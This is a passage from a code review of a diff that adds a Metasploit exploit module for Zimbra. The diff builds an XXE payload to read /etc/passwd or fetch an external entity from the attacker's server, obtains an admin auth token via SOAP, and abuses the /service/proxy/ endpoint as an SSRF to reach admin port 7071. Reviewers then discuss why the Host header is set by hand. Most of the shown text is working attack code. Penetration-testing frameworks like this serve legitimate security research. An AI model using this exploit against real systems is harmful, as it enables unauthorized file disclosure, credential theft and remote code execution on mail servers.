modules/exploits/linux/http/zimbra_xxe_rce.rb

```diff
@@ -0,0 +1,254 @@
+    ))
+
+    register_options [
+      OptString.new('TARGETURI', [true, 'Zimbra application base path', '/']),
+      OptInt.new('HTTPDELAY', [true, 'Number of seconds the web server will wait before termination', 10])
+    ]
+  end
+
+  def xxe_req(data)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, '/autodiscover'),
+      'encode_params' => false,
+      'data' => data
+    })
+    fail_with(Failure::Unknown, 'Request failed') unless res && res.code == 503
+    res
+  end
+
+  def soap_discover(check_soap=false)
+    xml = Document.new
+
+    xml.add_element('Autodiscover')
+    xml.root.add_element('Request')
+
+    req = xml.root.elements[1]
+
+    req.add_element('EMailAddress')
+    req.add_element('AcceptableResponseSchema')
+
+    sub = 'REPLACE'
+    req.elements['EMailAddress'].text = Faker::Internet.email
+    req.elements['AcceptableResponseSchema'].text = sub
+
+    doc = rand_text_alpha_lower(4..8)
+    entity = rand_text_alpha_lower(4..8)
+    local_file = '/etc/passwd'
+
+    res = "<!DOCTYPE #{doc} [<!ELEMENT #{doc} ANY>"
+    if check_soap
+      local = "file://#{local_file}"
+      res << "<!ENTITY #{entity} SYSTEM '#{local}'>]>"
+      res << "#{xml.to_s.sub(sub, "&#{entity};")}"
+    else
+      local = "http://#{srvhost_addr}:#{srvport}#{@service_path}"
+      res << "<!ENTITY % #{entity} SYSTEM '#{local}'>"
+      res << "%#{entity};]>"
+      res << "#{xml.to_s.sub(sub, "&#{@ent_data};")}"
+    end
+    res
+  end
+
+  def soap_auth(zimbra_user, zimbra_pass, admin=true)
+    urn = admin ? 'urn:zimbraAdmin' : 'urn:zimbraAccount'
+    xml = Document.new
+
+    xml.add_element(
+      'soap:Envelope',
+      {'xmlns:soap'  => 'http://www.w3.org/2003/05/soap-envelope'}
+    )
+
+    xml.root.add_element('soap:Body')
+    body = xml.root.elements[1]
+    body.add_element(
+      'AuthRequest',
+      {'xmlns' => urn}
+    )
+
+    zimbra_acc = body.elements[1]
+    zimbra_acc.add_element(
+      'account',
+      {'by' => 'adminName'}
+    )
+    zimbra_acc.add_element('password')
+
+    zimbra_acc.elements['account'].text  = "#{zimbra_user}"
+    zimbra_acc.elements['password'].text = "#{zimbra_pass}"
+
+    xml.to_s
+  end
+
+  def cookie_req(data)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, '/service/soap/'),
+      'data' => data
+    })
+    fail_with(Failure::Unknown, 'Request failed') unless res && res.code == 200
+    res
+  end
+
+  def proxy_req(data, auth_cookie)
+    target = "https://127.0.0.1:7071#{normalize_uri(target_uri, '/service/admin/soap/AuthRequest')}"
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, '/service/proxy/'),
+      'vars_get' => {'target' => target},
+      'cookie' => "ZM_ADMIN_AUTH_TOKEN=#{auth_cookie}",
+      'data' => data,
+      'headers' => {'Host' => "#{datastore['RHOST']}:7071"}
```

Comment:
I believe the `Host` header is set by the `vhost` parameter.

Reply:
I'm setting the Host header because it's part of the SSRF. The port number is the important part.

Reply:
Then please set it in the `vhost` parameter.

Reply:
vhost is automatically adding the port to the end so I can't use it.
`'vhost' => "#{datastore['RHOST']}:7071"` is becoming `Host: 172.22.222.111:7071:8443`

Reply:
Ah, the SSRF port number is *different*. My bad. Thank you for the explanation.